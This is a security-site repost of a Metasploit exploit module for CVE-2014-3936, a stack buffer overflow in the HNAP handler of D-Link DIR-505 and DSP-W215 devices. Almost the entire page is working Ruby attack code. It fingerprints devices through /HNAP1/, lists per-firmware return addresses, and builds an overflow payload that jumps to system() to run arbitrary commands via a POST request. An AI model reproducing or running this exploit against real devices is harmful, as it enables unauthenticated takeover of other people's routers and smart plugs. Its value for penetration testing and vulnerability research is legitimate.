首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
D-Link HNAP Request Remote Buffer Overflow
来源:metasploit.com 作者:Heffner 发布时间:2014-07-14  
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'D-Link HNAP Request Remote Buffer Overflow',
      'Description'    => %q{
        This module exploits an anonymous remote code execution vulnerability on different
        D-Link devices. The vulnerability is due to an stack based buffer overflow while
        handling malicious HTTP POST requests addressed to the HNAP handler. This module
        has been successfully tested on D-Link DIR-505 in an emulated environment.
      },
      'Author'         =>
        [
          'Craig Heffner', # vulnerability discovery and initial exploit
          'Michael Messner <devnull[at]s3cur1ty.de>' # Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'Platform'       => 'linux',
      'Arch'           => ARCH_MIPSBE,
      'References'     =>
        [
          ['CVE', '2014-3936'],
          ['BID', '67651'],
          ['URL', 'http://www.devttys0.com/2014/05/hacking-the-d-link-dsp-w215-smart-plug/'], # blog post from Craig including PoC
          ['URL', 'http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10029']
        ],
      'Targets'        =>
        [
          #
          # Automatic targeting via fingerprinting
          #
          [ 'Automatic Targeting', { 'auto' => true }  ],
          [ 'D-Link DSP-W215 - v1.0',
            {
              'Offset'  => 1000000,
              'Ret'     => 0x405cac, # jump to system - my_cgi.cgi
            }
          ],
          [ 'D-Link DIR-505 - v1.06',
            {
              'Offset'  => 30000,
              'Ret'     => 0x405234, # jump to system - my_cgi.cgi
            }
          ],
          [ 'D-Link DIR-505 - v1.07',
            {
              'Offset'  => 30000,
              'Ret'     => 0x405c5c, # jump to system - my_cgi.cgi
            }
          ]
        ],
      'DisclosureDate' => 'May 15 2014',
      'DefaultTarget'  => 0))

    deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR')
  end

  def check
    begin
      res = send_request_cgi({
        'uri' => "/HNAP1/",
        'method'  => 'GET'
      })

      if res && [200, 301, 302].include?(res.code)
        if res.body =~ /DIR-505/ && res.body =~ /1.07/
          @my_target = targets[3] if target['auto']
          return Exploit::CheckCode::Appears
        elsif res.body =~ /DIR-505/ && res.body =~ /1.06/
          @my_target = targets[2] if target['auto']
          return Exploit::CheckCode::Appears
        elsif res.body =~ /DSP-W215/ && res.body =~ /1.00/
          @my_target = targets[1] if target['auto']
          return Exploit::CheckCode::Appears
        else
          return Exploit::CheckCode::Detected
        end
      end
    rescue ::Rex::ConnectionError
      return Exploit::CheckCode::Safe
    end

    Exploit::CheckCode::Unknown
  end

  def exploit
    print_status("#{peer} - Trying to access the vulnerable URL...")

    @my_target = target
    check_code = check

    unless check_code == Exploit::CheckCode::Detected || check_code == Exploit::CheckCode::Appears
      fail_with(Failure::NoTarget, "#{peer} - Failed to detect a vulnerable device")
    end

    if @my_target.nil? || @my_target['auto']
      fail_with(Failure::NoTarget, "#{peer} - Failed to auto detect, try setting a manual target...")
    end

    print_status("#{peer} - Exploiting #{@my_target.name}...")
    execute_cmdstager(
      :flavor  => :echo,
      :linemax => 185
    )
  end

  def prepare_shellcode(cmd)
    buf = rand_text_alpha_upper(@my_target['Offset'])  # Stack filler
    buf << rand_text_alpha_upper(4)                    # $s0, don't care
    buf << rand_text_alpha_upper(4)                    # $s1, don't care
    buf << rand_text_alpha_upper(4)                    # $s2, don't care
    buf << rand_text_alpha_upper(4)                    # $s3, don't care
    buf << rand_text_alpha_upper(4)                    # $s4, don't care
    buf << [@my_target.ret].pack("N")                  # $ra

           # la $t9, system
           # la $s1, 0x440000
           # jalr $t9 ; system
           # addiu $a0, $sp, 0x28 # our command

    buf << rand_text_alpha_upper(40)                # Stack filler
    buf << cmd                                      # Command to execute
    buf << "\x00"                                   # NULL-terminate the command
  end

  def execute_command(cmd, opts)
    shellcode = prepare_shellcode(cmd)

    begin
      res = send_request_cgi({
        'method' => 'POST',
        'uri' => "/HNAP1/",
        'encode_params' => false,
        'data' => shellcode
      }, 5)
      return res
    rescue ::Rex::ConnectionError
      fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
    end
  end
end

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·D-Link Unauthenticated UPnP M-
·D-Link info.cgi POST Request B
·Dell Sonicwall Scrutinizer 11.
·HP Data protector manager 8.10
·Flash "Rosetta" JSONP GET/POST
·Elipse E3 Scada PLC Denial Of
·Yokogawa CS3000 BKFSim_vhfd.ex
·Oracle VirtualBox Guest Additi
·Netgear WNR1000v3 - Password R
·Browserify 4.2.0 Remote Comman
·Oracle Event Processing FileUp
·Wordpress WPTouch Authenticate
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved